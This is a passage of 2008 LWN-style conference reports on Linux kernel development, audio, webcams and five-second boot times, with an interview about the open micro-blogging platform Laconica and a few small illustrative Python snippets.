to note is that, while multi-queue is useful for wireless networking, it is
also an important high-end scalability improvement.  When the system tries
to drive a 10Gb/s network card at full speed, the locking contention on a
single queue gets to be a significant performance problem.

Matt Mackall presented his bloatwatch work, which monitors
the text and data sizes of kernel releases.  Unsurprisingly, the kernel is
getting larger over time - a development which does not please embedded
systems vendors.  Bloatwatch allows interested people to see which code
changes caused a given kernel release to grow.  Matt would like to have
more people using this tool and trying to keep a lid on kernel growth.
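
The basic comparison behind this sort of monitoring can be sketched in a few lines of Python.  This is not how bloatwatch itself is implemented; the symbol names and sizes are made up, and the function is a hypothetical illustration of diffing per-symbol sizes between two builds.

```python
def size_growth(old_sizes, new_sizes):
    """Return (symbol, delta_bytes) pairs for symbols that grew or appeared,
    largest growth first."""
    deltas = []
    for symbol, new_size in new_sizes.items():
        delta = new_size - old_sizes.get(symbol, 0)
        if delta > 0:
            deltas.append((symbol, delta))
    return sorted(deltas, key=lambda item: item[1], reverse=True)

# Made-up per-symbol sizes, in bytes, for two releases.
release_a = {"sched_init": 1200, "vfs_read": 800, "tcp_sendmsg": 3000}
release_b = {"sched_init": 1500, "vfs_read": 780, "tcp_sendmsg": 3900,
             "new_feature": 400}

growth = size_growth(release_a, release_b)
```

Sorting by growth puts the worst offenders at the top, which is the view somebody trying to keep a lid on kernel size would want first.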

It was suggested that bloatwatch could be run against linux-next and used
to catch bloat before it gets into the mainline.  Linus asked if growth
could be correlated with the information in the git repository, making it
possible to shame individual developers.

Overall, it was noted that kernel growth is lagging far behind Moore's law,
suggesting that the kernel is requiring a smaller portion of system memory
over time.  Still, it would be good to use even less; Matt figures that
about half the growth in the kernel is something which can be avoided with
some thought.

		KS2008: All about threads


Ben Herrenschmidt led a session on the management of thread pools in the
kernel.  Kernel threads are typically used as a way for kernel code to do
long-running work (which might sleep) as a separate task.  The main
mechanism used in the kernel now is the workqueue interface, but workqueues
are not perfect.  They have become a sort of last resort for all kinds of
tasks which need to run in process context.

Problems with workqueues include the fact that they serialize all tasks,
even when that serialization is not needed.  In some cases, this
serialization could lead to deadlocks.  Workqueues offer developers the
choice of setting up their own dedicated worker threads or using keventd -
a set of per-CPU threads shared across all users.  The dedicated threads
are often overkill for the developer's needs, but using keventd can lead to
unpredictable latencies.  Often there is no good choice.  What's needed is
an API that can allow more than one thing to happen on any given CPU while
still providing shared threads and low latency.
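
The latency problem can be shown with a toy simulation.  The Python sketch below is not kernel code; it assumes all tasks are queued at time zero and dispatched in FIFO order, and the function name and task durations are invented for illustration.

```python
import heapq

def completion_times(durations, workers):
    """Simulate FIFO dispatch of tasks (all queued at time 0) onto `workers`
    threads; return the time at which each task finishes."""
    free_at = [0.0] * workers           # when each worker next becomes idle
    heapq.heapify(free_at)
    finished = []
    for duration in durations:
        start = heapq.heappop(free_at)  # earliest available worker takes the task
        end = start + duration
        finished.append(end)
        heapq.heappush(free_at, end)
    return finished

# A long-running task (10 s) queued ahead of two short ones (0.1 s each).
tasks = [10.0, 0.1, 0.1]
serialized = completion_times(tasks, workers=1)  # one shared thread
pooled = completion_times(tasks, workers=2)      # small pool
```

With a single shared thread the short tasks wait out the full ten seconds; with just one extra worker they finish almost immediately, which is the behavior a shared pool is meant to provide.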

One idea is to allow keventd to fork.  There could be a new form of
workqueue with an "asynchronous" flag set.  When a task is queued, keventd
would fork and process the task immediately.  It would be a relatively easy
change to make, but it would also be somewhat inefficient - forks are
expensive.

Another option would be to go with one of the existing thread pool
implementations; there are already a few in circulation.  The pdflush daemon
has a simple mechanism which can grow and shrink the pool of threads based
on demand.  Btrfs has a thread pool which is tightly tailored to its needs;
it does not resize the pool, but it does provide low latency.  The sunrpc
code has a thread pool which Ben described as "scary."  There is also a
proposal from David Howells for a "slow work" mechanism.  It is the most
generic of the options, and supports resizing as well.

The options were discussed for a bit; Linus's suggestion at the end was to
just extend the workqueue interface to provide a small, fixed-size pool.
Ben replied that the code for resizing the pool is sufficiently simple that
there is no point in leaving it out.

Thomas Gleixner led a discussion on a related subject: the threaded
interrupt handlers which are currently living in the realtime tree.  It
seems that 
the realtime developers have finally recovered from having taken on the
maintainership of the x86 code and are now getting back to thinking about
getting the remaining realtime code merged.

The realtime tree is set up to thread almost all interrupt handlers, but
that will not work for the mainline.  Some devices will continue to run
with synchronous interrupt handling, and the idea of running software
interrupts in threads is not popular with the networking developers.  So
the suggestion is to provide a new version of request_irq() which
would allow a driver to set up a threaded interrupt handler.  In the
absence of a change by the driver maintainer, interrupt handlers would
continue to be run synchronously.

Linus strongly requested that a new request function be added, rather than making a
change to request_irq() itself.  It seems he is still feeling the
pain of previous changes to request_irq(), which have required
fixing massive numbers of drivers.  The separate request function was
always in the plan; the requirements are significantly different.  In
particular, drivers using threaded interrupt handlers still need to provide
a small, synchronous handler which can determine whether the driver's
device is actually interrupting.  Without that small handler, it is hard to
make the handling of shared interrupt lines work right.
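
The division of labor between the two handlers can be modeled in Python.  The sketch below is a toy, not the interface under discussion; every class, method, and device name is hypothetical, and the "thread" is simply called directly.

```python
class Device:
    """Toy device on a shared interrupt line (all names here are hypothetical)."""

    def __init__(self, name):
        self.name = name
        self.pending = False   # stands in for a hardware status register
        self.handled = 0

    def quick_check(self):
        """Small synchronous handler: is this device actually interrupting?"""
        return self.pending

    def thread_handler(self):
        """The bulk of the work, which would run later in a thread."""
        self.pending = False
        self.handled += 1

def dispatch_shared_irq(devices):
    """Run every quick check; return the devices whose threads need waking."""
    return [dev for dev in devices if dev.quick_check()]

disk, nic = Device("disk"), Device("nic")
nic.pending = True                  # only the network card raised the line
to_wake = dispatch_shared_irq([disk, nic])
for dev in to_wake:
    dev.thread_handler()            # in a kernel this would run in its own thread
```

Without the quick check, the dispatcher would have no way of knowing which of the devices sharing the line needs its thread woken.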

There was some discussion of details, but no real objection to the overall
plan.  So chances are good that threaded interrupt handlers will be posted
for the 2.6.28 or 2.6.29 development cycles.

		KS2008: Kernel code with large user-space components


The direct rendering infrastructure (DRI) code has always played by different
rules than the rest of the kernel.  It is an out-of-tree project which has
produced wildly different sets of APIs over the years.  And it has never
quite been as good as anybody would like.  This recent LWN article covers
some changes happening in the DRI camp.
The unique nature of DRI can be traced back to the fact that much of
the problem can only be solved in user space.  At the 2008 kernel summit,
graphics developer Dave Airlie led a session on "best practices" for the
creation of kernel code which, like DRI, has large user-space pieces.

Dave says that developers for much of the kernel have an easy life; they can
work toward the implementation of a well-defined interface which has been
specified by POSIX for years.  But some folks are not so privileged.  In
the graphics world, every device must expose a different interface to user
space; every attempt to standardize these interfaces has produced highly
ugly results.  There is no standard here, and there is no real prospect of
creating one.

Actually, that is not quite true; the standard for this kind of device is
OpenGL.  But there is little interest in putting a full OpenGL
implementation into the kernel itself.  So there has to be a wide channel
of communication between user space and the kernel, and it will always be
somewhat device-specific.

The DRI project develops its code outside of the mainline because
stabilizing this user-space API is hard.  The bulk of the code (90%) is in user
space, and, until all that user-space code works, it is not at all clear
that the interface with the kernel is correct.  Once the code goes into the
mainline, that API must be frozen.  So DRI code will remain outside until
the developers can be confident that the API has reached a stable state.

The other reason for out-of-tree development is the need to make life
easier for testers.  There are a fair number of people who are interested
in testing graphics drivers, but who are not kernel developers.  The DRI
project wants to allow these testers to operate on a stable base - the
kernel provided by their distributor, preferably - and not have to run
bleeding-edge mainline kernels.  So the DRI code has enough
backward-compatibility code in it to allow it to run with a range of kernel
versions.  This code is not welcome in the mainline, so it must be removed
before any DRI code is submitted upstream.  But it must remain in the DRI
tree, or the project will lose a lot of testers.

Dave had a couple of requests for the kernel development community.  One of
those was to be allowed to keep the backward compatibility code even when
drivers are sent upstream.  Compatibility would not have to be long term -
three development cycles, perhaps - but the ability to run across that
range of kernels would make life a lot easier.  It would also eliminate the
need for the DRI developers to rewrite the code immediately before
submission to the mainline - a process which does not help to assure stable
operation. There was not a lot of
opposition to this idea.  Linus did note, though, that the DRI developers
have not been complaining about API changes which cause them trouble.  His
suggestion was that they let the community know when API changes create
pain; perhaps some of those changes could be reworked to lower their impact
on out-of-tree code.

The other request was to be allowed to put exports for kernel symbols into
the mainline even though the code using those exports is not yet being
merged.  The presence of those exports would, again, make life easier for
testers.  This idea, too, drew no serious opposition.  It was suggested
that any such export should be accompanied by a comment explaining why it
exists and should not be removed.

		KS2008: Fixing the Kernel Janitors Project


James Bottomley started off this session by saying that he had proposed it
after being annoyed by one too many white space patches in his mailbox.  He
does not believe that encouraging people to blindly fix white space problems
is a good way to bring in new developers.  So the central question for this
session was: how can we do a better job of involving newcomers in the
kernel development process?

Linus asked that new developers not start by trying to fix warnings - a
task which currently appears on the "to do" list run by
the janitors project.  In the past, he has not enjoyed that experience at
all.  Beginner fixes for warnings tend to be aimed at silencing the warning
rather than really understanding what is going on; as a result, they often break
things.  A better place for people to start, he says, is by testing the kernel and
providing good bug reports.

Andi Kleen said that task lists can be useful.  He put together a document
on how to switch code over to the unlocked_ioctl() file operation,
thus eliminating the big kernel lock.  Some people made use of it and got
some useful work done.  Linus pointed out, though, that a certain Alan Cox
followed that document and got things wrong, forcing the developers to
revert his broken patch.

Matthew Wilcox stated that the problem in the kernel community is not a
shortage of patches - it's a shortage of review.  So he would rather start
new developers on tasks like bug reports.  Jeff Garzik noted that good
results can be had by encouraging new developers to acquire an obscure
piece of hardware and improve the driver.  That only works if one is
willing to put in a fair amount of mentoring time, though.

Mentoring is a subject that came around a few times.  Greg Kroah-Hartman's
Linux driver project work has provided a forum for mentoring, and that has
helped a number of developers to improve their skills.  But Dave Airlie
asked how many developers had been "mentored" into the system; almost no
hands were raised.  The thing that creates new kernel developers still
appears to be bugs that irritate people into fixing them.  That led to the
inevitable suggestion that the developers in the room should fix fewer
bugs, providing more opportunities for the recruiting of new developers.

Having prospective developers run regression tests was suggested, but was
not received with a great deal of enthusiasm.  Far better, said Linus, was
to have people test out as much hardware as they can; that's where the real
problems lie.

One often-cited problem with the janitors project is that it is not good at
graduating developers to bigger and better tasks.  Any sort of mentoring
effort should be oriented toward helping developers to grow while, at the
same time, having them do something useful at every step.

Andrew Morton - who was quieter than usual this year - noted that quite a
few people who express interest in kernel development disappear before too
long.  Putting effort into mentoring them can thus lead to a lot of wasted
time.  It is better, he said, to do this kind of mentoring in a group
situation.  There have been problems, though, with people posting incorrect
answers to questions on mailing lists, so group mentoring must be handled
carefully as well.

Andrew repeated his statement that the best thing for new developers to do
is to ensure that every system they have access to runs perfectly with
current kernels.

An attempt was made to get some action items out of the session.  The
creation of a mentoring project was suggested, but nobody stepped forward
to take that on.  There was a request for more distributors to package
testing kernels for users who would like to experiment with the leading
edge.  Al Viro, though, argued for a stronger emphasis on getting people to
read code, rather than write it.  That reading can take the form of code
review or simply taking the time to figure things out.

Linus would like a tool which could create a minimally useful kernel
configuration for a given system.  A full distributor configuration takes
far too long to build, and the prospect of creating a custom configuration
is increasingly daunting.  Linus noted that his first kernel for a new
system never works - he is certainly not unique in that regard.  It turns
out that such a tool exists; it will be dusted off and posted soon.

		LPC: Fitting into the kernel ecosystem


The first Linux Plumbers Conference started on September 17, 2008; the
opening talk was a keynote by Greg Kroah-Hartman.  He got the conference
going with a provocative sermon on how the development ecosystem works
and the niche we all occupy within it.  It was a fun talk - unless you
happen to work for Canonical.

He started with an apology to Canonical, though.  In earlier talks, he had
said that only eight kernel patches had ever come from Canonical.  In fact,
he has been corrected; the proper number is 100.

So, Greg asked, why is he picking on Canonical?  His answer came in the
form of a table of contributors to the kernel.  It looked like this:


Then Greg asked: does anybody from Canonical want to say anything?  Nobody
did.


Greg then moved on to the Linux ecosystem, putting up a slide showing the larger
components of this ecosystem - the low-level stuff that makes Linux what it
is.  Some of the largest components, beyond the kernel, were GCC,
binutils, X.org, and the man pages distribution.  Looking at lines of
code, the kernel amounts to about 40% of the total.  Other large components
are all significantly smaller.

It turns out that Greg has been doing repository data mining in a number of
projects beyond the kernel.  So, for projects like GCC, X.org, and
binutils, he was able to put up tables listing the top contributors.  The
results varied somewhat, but there were a number of recurring themes.  Red Hat
tends to be toward the top of the list on all of these projects; companies
like IBM and Novell also appear regularly.  CodeSourcery is a significant
contributor to GCC and binutils.  The U.S. National Security Agency
contributes 2.1% of the patches into X.org; why is not clear.
In all of these projects there are significant contributions from
unpaid developers, but those contributions are overshadowed by those from
paid developers.

And Canonical is always at the bottom of the chart - if it is there at all.

At this point Greg moved to a whiteboard to present his view of how the
community works.  At the development level, you have developers
contributing to projects, which then release the code.  There may be a few
users at that level who feed back information (and maybe patches), but, in
general, the biggest consumers of the project's releases are the
distributors.

Distributors package everything and provide it to their users.  At this
point, another feedback loop comes into play: users feed their experiences
and problems back to the distributor.  Those distributors will respond to
the user feedback, improving their products.  The amount of feedback from
the distributors to the upstream projects varies, but it tends to be
small.  For enterprise distributions, it is quite small; they are running
ancient versions of everything and have little to do with current
upstream.  The community-oriented distributions, such as Fedora or
openSUSE, tend to feed more changes back to their upstream sources.

Then, there is the matter of redistributors who base their products on
another distributor's work; these are distributors like Ubuntu or CentOS.
There are no contributions back to the community from that kind of
distributor at all.  They are not functioning as a part of the Linux
ecosystem.


Greg finished up with what appears to be the message he came to the Linux
Plumbers Conference to deliver: if you are a developer, if you want to be a
part of the ecosystem, and if you work for a non-contributing company:
quit.  There are plenty of companies that understand the ecosystem and
which need good people; at least one company, it seems, had wanted to set
up a recruiting table at the conference.  It is a very good time for people
with community participation skills; there is no reason for anybody who
wants to work in the community to stay on the outside.


[As a postscript, it is amusing to note that, while the conference did not
allow companies to set up recruiting tables, nobody has prevented
prospective employers from filling a prominently-placed whiteboard with
information about available positions.]

		LPC: Linux audio: it's a mess


Audio is a fitting topic for the first day of the Linux
Plumbers Conference. Users want sound to
Just Work, and there's lots of working code in
individual projects.  But so far, it seems like
nobody has everything quite plumbed together in an
annoyance-free way.

Lennart Poettering, a lead developer of PulseAudio and a Red Hat employee,
moderated the miniconference and started with a
summary of the state of Linux audio: "it's a mess."

The audio miniconference came up with two steps
toward cleaning up the mess, though.  First, come up
with a coherent story for application developers on
what sound API to use, and how.  Second, clean up the
often-confusing array of user-visible audio level controls.

PulseAudio first reached regular users in Fedora 8 and is now,
as Lennart puts it, "the software that currently breaks your audio"
for up-to-date users.
PulseAudio is a sound server that mixes audio from
multiple applications and passes it along to the
sound hardware. It offers advanced features such
as network transparency: an application running on a
remote system can play a sound, and PulseAudio makes it
come out of the speakers on the machine where
the user is working.  Supporting it shouldn't
be a big change for most application developers
to handle.  It will handle applications written
to the kernel's maintained audio API, ALSA,  using the  
PulseAudio backend for alsa-lib.  So the
PulseAudio transition has been relatively painless
for the distributions.

An earlier sound server, the Enlightened
Sound Daemon (ESD),
is falling out of favor, and the Media
Application Server (MAS) has never really caught
on. However, one of the competing sound servers looks likely
to remain.  On the pro audio side, the low-latency
sound server JACK
is the recommended option.  JACK, the "Jack Audio
Connection Kit," as Dave Phillips writes, "holds  
the keys to the kingdom" for connecting
studio applications such as the Ardour  
digital audio workstation and the Rosegarden  
MIDI sequencer.  "If you want all of the features,
no one audio system supports all of them," Lennart
said.

Apple and Microsoft each have a single sound server
that does both desktop and pro audio, but nobody at
the session seemed to have much interest in that
direction for Linux.  PulseAudio is optimized for
general desktop use and power savings, and supports
scheduling features that should minimize wakeups but
still allow for reasonably low-latency playback of
streaming audio.  It's also
network-transparent and supports features such as
placing desktop sound events based on mouse position.

Network audio and desktop effects don't tempt pro
audio users.  JACK's uncompromising approach toward
latency means it's likely to hog too much power to
be acceptable to battery-life-watching desktop users,
but fine for a studio with a rack full of gear.  So two
sound servers, one for pro and one for the masses, seems
to be fine with both sets of users.

Abusing ALSA

PulseAudio, however, can't give applications direct
access to the hardware, and currently only about 70%
of ALSA applications use the API in a PulseAudio-safe
way, Lennart said.  Some high-profile applications
are among those doing audio wrong.  "Flash and
Skype are really really broken applications,
especially Flash," he said.  Adobe split out the
parts of its code that talk to the audio subsystem,
and certain other plumbing, into an open-source
library, libflashsupport.  But Flash remains broken.
The proprietary Flash library talks to libflashsupport
from multiple threads, and one thread calls a
destructor while another continues to send data.
"It works until you close the browser window and then
you get a race,"  Lennart said.

Developers who want to play audio have a
sometimes-confusing choice of tools, including PortAudio and  
GStreamer.
(PortAudio is cross-platform, which is likely why
the popular cross-platform audio editing application
Audacity uses it.)  GStreamer is relatively
feature-intense and heavyweight, also handling
video and transcoding.  (Write a player with
GStreamer and you get the ability to play your
collection of C64 SID files for free.)

"If someone comes and says, 'I want to
write an audio application. Which API should
I use?' I don't have a good answer," Lennart
said.  The current best answer seems to be to
write to the PulseAudio-safe subset of ALSA.

Jeff Licquia
of the Linux Standard Base (LSB), in the audience,
mentioned that ALSA is on track for inclusion
in LSB 4.0, and is a trial use module for 3.2.
LSB aims to define a compatibility standard for
Linux applications, and aims to do the kind of
application developer education that Linux audio
developers seem to need.  Applications seeking LSB
certification must run all of the LSB tests, but can
fail anything tagged as trial use.  "We're only keeping
the stuff that we hope will be around for the long
term," he said.  If the LSB-safe subset of ALSA fits
into the PulseAudio-safe subset of ALSA, application
developers could write to ALSA and test with LSB.

"I would like to be able to tell people to use libsydney,"
Lennart said.  Libsydney, in  
progress, is intended to be a networking-friendly
general-purpose audio API.
ALSA and the HD-Audio widget problem
In ALSA, the hardware/software interface is in
good shape, but the software-to-user interface needs some work.  Takashi
Iwai, a core ALSA developer and Novell
employee, pointed out in a talk that the line
count for /sound code in the kernel is actually
shrinking, except for ASoC (system on a chip)
and HD-audio.  "There will be no more sound cards,
especially PCI," he said.  The one exception is the
Sound Blaster X-Fi for gamers, which is currently
not supported well in ALSA.  Creative announced proprietary  
drivers in 2006, but one ALSA developer recently
did get access to a data sheet under NDA.  
The new audio standard, HD-Audio, is commonly
found on new systems, and it's well-supported at the
kernel level.  However, it's based on "widgets" with
vendor-configurable I/O pins.  A driver can't tell
how the HD-Audio part is connected, so some Linux
plumbing work is required to identify which of the
many exposed level controls is the right one to show
the user.  An audience member pointed out the need
to tweak multiple level settings on his hardware,
to get the right level without distortion.
Linux will need more information on how each
machine has its HD-Audio hardware hooked up in order
to reliably give the user a useful volume control.

		Leo Laporte on open micro-blogging


  Radio talk show and podcast host Leo
  Laporte doesn't think operating systems or network infrastructures should
  ever be proprietary. He's the host of The Tech
  Guy radio show, which airs every weekend on stations around the United
  States, and of FLOSS Weekly, a regular
  podcast in which Laporte discusses different aspects of the Free, Libre, and
  Open Source software community. On The Tech Guy show, Laporte answers
  questions from computer users who call in to get advice and find ways to make
  their computers run better. Most of his callers are Windows users, but
  Laporte usually
  finds a 
  way to mention Linux and other open source software during the course of his
  show. 


  Laporte says he has been writing software for decades, and that he has always
  shared the source code, even before he had a notion of open
  source. "It was 
  public domain then. But even then, I understood that if you're programming,
  the most interesting part is to see other people's code and be able to modify
  it. That's just a natural way to work." His first shot at
  installing Linux was 
  back in 1994 when he got his hands on a copy of Slackware. "It was
  murder — 
  but it opened my eyes to the growing open source world."


  At the time, Laporte was the host of a cable television show called Tech TV.
  "We were the first television show to install Linux live."
  On that show, 
  Laporte hosted some of the biggest names in FLOSS, including Linus Torvalds
  and Richard Stallman, during Tech TV's run. "The longer I worked as a computer
  journalist, the more obvious it became to me that proprietary software is a
  bad idea. It's not natural to be secretive and it doesn't make sense." Laporte
  says that especially in the enterprise, the technological infrastructure
  should be open. "That should never be proprietary. Protocols, standards, and
  code need to be open."


  When it comes to applications, Laporte is a bit more flexible. "If you want to
  write an app that is closed source, I can see there are reasons why one might
  want to do that and that's fine with me. But closing the operating system
  makes no sense, and it is bad for everybody."


  Laporte, a Twitter user with over
  fifty-five thousand followers, recently announced he would no longer use
  Twitter, but would instead now throw his support behind
  Laconica, the open source micro-blogging
  platform on which Identi.ca is built. Laporte
  spoke extensively about Laconica on FLOSS Weekly last month when he chatted
  with Evan Prodromou, the original
  author of Laconica and the person who maintains identi.ca.


  "Laconica is identical to Twitter, but it's open, which is huge,
  and, more than open just in terms of it being open source."
  Laporte 
  says open standards are just as important in this case, and that the protocols
  for micro-blogging should become commoditized so that others can build
  on top of the infrastructure instead of having to start from
  scratch. Laconica also offers users the option to release all their
  micro-posts under a Creative Commons attribution license, making the service
  about as "open as you could hope for," writes Dan Brickley, co-founder of the
  Friend of a Friend project (FOAF).


  With Laconica, different micro-blogging services can communicate with each
  other since the platform is open, unlike Twitter's service. This makes it
  possible for different communities to form their own branded services in which
  users can still search for and follow users in other communities, tying them
  together in what has become known as a "federation." Right now, Laconica is
  running on
  dozens
  of disparate servers, whose users can all subscribe to each other's
  updates. Laconica is built using the
  OpenMicroBlogging
  specification, which is completely open, free, and independent of any one
  central maintenance authority, unlike Twitter's proprietary protocol.


  Laporte believes that this kind of federation, which could be called
  distributed micro-blogging, is the key to overcoming scalability issues that
  have plagued Twitter, resulting in frequent outages for the popular service.
  "If you can't scale, that's another reason to have a more
  distributed system. Maybe we shouldn't have two million people on one
  Twitter. Maybe we 
  should have five thousand people on four hundred 'twitters.' I have three
  thousand people on my system, and that's just about right."


  Laporte's system is called the TWiT
  Army, [Note that the web site is currently down]
  named after another of his podcasts known as This
  Week in Tech, or TWiT. "The conversation [there] has been very
  cohesive. The conversation is with people you know. With Twitter, it
  turns into a broadcast medium instead of a conversation. Now, it is a very
  useful way to get a message out to all those people. But I would love to have
  all those people all in their own communities, able to search across the
  federation by keyword, and if I post something of interest they'll find out
  about it."


  Laporte says he is not trying to go "head to head" against Twitter. But he is
  convinced that Laconica is a better way to do micro-blogging.  "One of my
  problems with Twitter is that I contribute a lot of content and they shut down
  access to it. I want to be part of an open platform — that's where the
  innovation is going to occur."


  Laporte says that instant messaging and "track," both of which Twitter
  previously offered but has since shut down, were
  two of the most valuable features that Twitter offered. "Comcast realized a
  huge value from Track," he says. Comcast customer service agents were tracking
  Twitter posts to monitor complaints or issues posted by users, and then
  following up directly with those people. "Twitter was saying, 'well it's too
  demanding,' but the conspiracy theory is that they realize this is where the
  real value of Twitter is and they want to try to monetize it." With Laconica,
  Laporte says, these types of features can remain open and accessible, not
  subject to the whims of proprietary ownership.


  Laporte, Prodromou, and others including RSS pioneer
  Dave Winer, are talking about a
  collaborative effort to standardize and open the protocols for micro-blogging.
  The group is planning a
  conference
  for all who are interested in the concept of open micro-blogging, called the
  BearhugCamp. Laporte says, "We would very much like to
  encourage Twitter to become a part. The idea is to get all the
  players to the table and encourage them to support the
  Extensible Messaging and Presence Protocol
  (XMPP) (developed by Jabber). We're creating
  a new messaging medium with emerging open standards, in new and exciting ways.
  It's not really about Twitter at all – Twitter gave us this idea of
  micro-blogging, and now we're onto the next thing: let's make it open."


		LPC: What's happening with webcams


Christmas is coming early for webcam
users.  Support for hundreds of popular
webcams, available from Michel Xhaard's GSPCA project,  
has been merged
for inclusion in the upcoming 2.6.27 kernel.
The amount of tweaking required from the user, the
distribution, or both, has been cut, and it's likely
that a random webcam will now just work out of the
box.  

Even with the much-wanted drivers
becoming part of mainstream Linux, a small
matter of plumbing remains.  Webcams, Hans  
de Goede pointed out at the Linux
Plumbers Conference, produce a variety of
compressed video data.  "They all came up
with interesting proprietary compressed video
formats," he said.  The out-of-tree version of
GSPCA did some decoding in kernel space, but the  
decoding of many camera-specific custom video
formats had to be ripped out, as doing
that kind of work in-kernel is a Linux faux
pas.  That's where Hans's libv4l comes in.  Announced  
in June, the new library (actually a set of three)
does the format conversion.
While not a Red Hat employee
at the time (he is now), Hans posted a "BetterWebcamSupport"
feature idea on the Fedora wiki, writing, "Currently
many webcams do not work with Fedora out of the box
even though a Linux driver exists for them."  The
problem was partly fixed with the GSPCA cleanup and
inclusion upstream, and partly became the rationale
for libv4l.  Besides the core libv4lconvert library,
the package includes libv4l2, to emulate a /dev/videoX
device which, transparently to the application,
will deliver "sane" video formats.  There's also a
libv4l1 to do the same thing but for the V4L1 API.
An audience member asked why the library
is separate from GStreamer, which is already
set up for video transcoding.  V4L2 developer Hans
Verkuil responded from the audience that "it's
something that you do not want to have in the kernel,
but it has to be small and fast."  That leaves out
GStreamer as a general solution, since some webcam
applications don't need GStreamer or can't afford
the space it takes.  Therefore, a separate library.
It needs one more feature, too: vendors install
camera chips however they'll fit, which means the
same camera module could be right side up on one
product and upside down on another.  Therefore,
libv4l has software support for flipping images,
but it still needs the data to know when to flip:
a table identifying which hardware has the camera
module in which orientation.
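
As a rough illustration of the missing piece, the sketch below pairs an orientation table with a software flip.  The table contents, the UPSIDE_DOWN name, and both function names are assumptions made for this example; the format libv4l will actually use for this data is not described here.

```python
# Hypothetical table of (vendor, product) pairs whose camera module is
# mounted upside down; these entries are invented for illustration.
UPSIDE_DOWN = {
    ("ExampleVendor", "Laptop A"),
}


def rotate_180(frame):
    """Return the frame rotated by 180 degrees.

    A frame is a list of rows, each row a list of pixel values.
    Reversing the row order flips vertically; reversing each row
    flips horizontally.  Doing both turns the image right side up.
    """
    return [list(reversed(row)) for row in reversed(frame)]


def orient_frame(frame, vendor, product):
    """Flip the frame only when the table says the module is inverted."""
    if (vendor, product) in UPSIDE_DOWN:
        return rotate_180(frame)
    return frame


if __name__ == "__main__":
    frame = [[1, 2, 3],
             [4, 5, 6]]
    print(orient_frame(frame, "ExampleVendor", "Laptop A"))  # [[6, 5, 4], [3, 2, 1]]
    print(orient_frame(frame, "OtherVendor", "Laptop B"))    # [[1, 2, 3], [4, 5, 6]]
```

The flip itself is cheap; the hard part, as the talk noted, is collecting the table.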
Brandon Philips
at SUSE has another piece of the puzzle,
a "frame server" that lets multiple
applications share the webcam—doing
for the webcam what PulseAudio does for the
sound hardware.  Without one, you can't shoot a photo with Cheese
while another app has the webcam open, as he showed in
a screenshot.
You can always rely on the computer hardware
industry to figure out ways to save a little money
on something if it's possible to solve the problem
in software.  Many new webcams have motorized focus
but no hardware autofocus.  Autofocus is up to the
host system—which means a focusing daemon needs
to see the video at the same time as an end-user
application. So providing access for the autofocus
daemon is another reason for the frame server.
Someone on the mailing list has the autofocus math
that will form the guts of the daemon figured out,
but it's a fairly intensive calculation and will
need to be done on an occasional frame of video,
not each frame.
While the original frame server idea would have
one shared memory segment per system, with access
for multiple users, PulseAudio developer Lennart
Poettering, speaking from the audience, pointed out the
potential security risks of that idea.  "Memory mapping
across privileges is a really bad idea," he said.
He suggested putting the frame server in the user
session to prevent users from, at least, killing each
other's webcam applications.

The webcam market is one where Linux is an
afterthought if it's a thought at all.  The Linux
conferences aren't teeming with employees of webcam
manufacturers.  The support Linux does have shows
that the community can still support hardware on its
own when it has to.


		LPC: Booting Linux in five seconds


At the Linux Plumbers Conference Thursday,
Arjan van de
Ven, Linux developer at Intel and author of
PowerTOP, and Auke Kok, another Linux developer at
Intel's Open
Source Technology Center, demonstrated a Linux
system booting in five seconds.  The hardware was
an Asus Eee PC, which has solid-state storage,
and the two developers beat the five-second
mark with two software loads: one modified Fedora and one
modified Moblin.
They had to hold up the Eee PC for the audience,
since the time required to finish booting was less
than the time needed for the projector to sync.
How did they do it?  Arjan said it starts with
the right attitude.  "It's not about booting faster,
it's about booting in 5 seconds."  Instead of saving
a second here and there, set a time budget for the
whole system, and make each step of the boot finish
in its allotted time.  And no cheating.  "Done booting
means CPU and disk idle," Arjan said.  No fair putting
up the desktop while still starting services behind
the scenes.  (An audience member pointed out that
Microsoft does this.)  The "done booting" time did
not include bringing up the network, but did include
starting NetworkManager.  A system with a conventional
hard disk will have to take longer to start up: Arjan
said he has run the same load on a ThinkPad and achieved
a 10-second boot time.
Out of the box, Fedora takes
45 seconds from power on to GDM  
login screen.  A tool called Bootchart,  
by Ziga Mahkovec, offers some details.  In a
Bootchart graph of the Fedora boot (fig. 1), the
system does some apparently time-wasting things.
It spends a full second starting the loopback
device—checking to see if all the network
interfaces on the system are loopback.  Then there are
two seconds to start "sendmail."  "Everybody pays
because someone else wants to run a mail server,"
Arjan said, and suggested that for the common
laptop use case—an SMTP server used only
for outgoing mail—the user can simply run ssmtp.

Another time-consuming process
on Fedora was "setroubleshootd," a useful  
tool for finding problems with Security Enhanced
Linux (SELinux) configuration.  It took five seconds.
Fedora was not to blame for everything.  Some upstream
projects had puzzling delays as well.  The X Window
System runs the C preprocessor and compiler on
startup, in order to build its keyboard mappings.
Ubuntu's boot time is about the same: two
seconds shorter (fig. 2).  It spends 12 seconds running
modprobe running a shell running modprobe, which
ends up loading a single module.  The tool for adding
license-restricted drivers takes 2.5 seconds—on
a system with no restricted drivers needed.
"Everybody else pays for the binary driver," Arjan
said.  And Ubuntu's GDM takes another 2.5 seconds of
pure CPU time, to display the background image.

Both distributions use splash screens.  Arjan and
Auke agreed, "We hate splash screens.  By the time
you see it, we want to be done."  The development
time that distributions spend on splash screens is
much more than the Intel team spent on booting fast
enough not to need one.
How they did it: the kernel
Step one was to make the budget.  The kernel
gets one second to start, including all modules.
"Early boot," including init scripts and background
tasks, gets another second.  X gets another second,
and the desktop environment gets two.
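
The budget approach can be written down in a few lines.  In this minimal sketch, the per-stage allowances are the ones quoted above; the measured times and the function names are hypothetical, chosen only to show how a stage that overruns its allotment would be flagged.

```python
# Boot time budget from the talk, in seconds per stage.
BUDGET = {
    "kernel": 1.0,
    "early boot": 1.0,
    "X": 1.0,
    "desktop": 2.0,
}


def total_budget(budget):
    """Sum the per-stage allowances."""
    return sum(budget.values())


def over_budget(measured, budget):
    """Return the stages whose measured time exceeds their allowance."""
    return [stage for stage, limit in budget.items()
            if measured.get(stage, 0.0) > limit]


if __name__ == "__main__":
    # Hypothetical measurements, not figures from the talk.
    measured = {"kernel": 0.9, "early boot": 1.4, "X": 1.0, "desktop": 1.8}
    print(total_budget(BUDGET))           # 5.0
    print(over_budget(measured, BUDGET))  # ['early boot']
```

A stage that runs over does not get to borrow from its neighbors; it simply shows up as the thing to fix.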
The kernel has to be built without initrd, which
takes half a second with nothing in it.  So all
modules required for boot must be built into the
kernel.  "With a handful of modules you cover 95% of
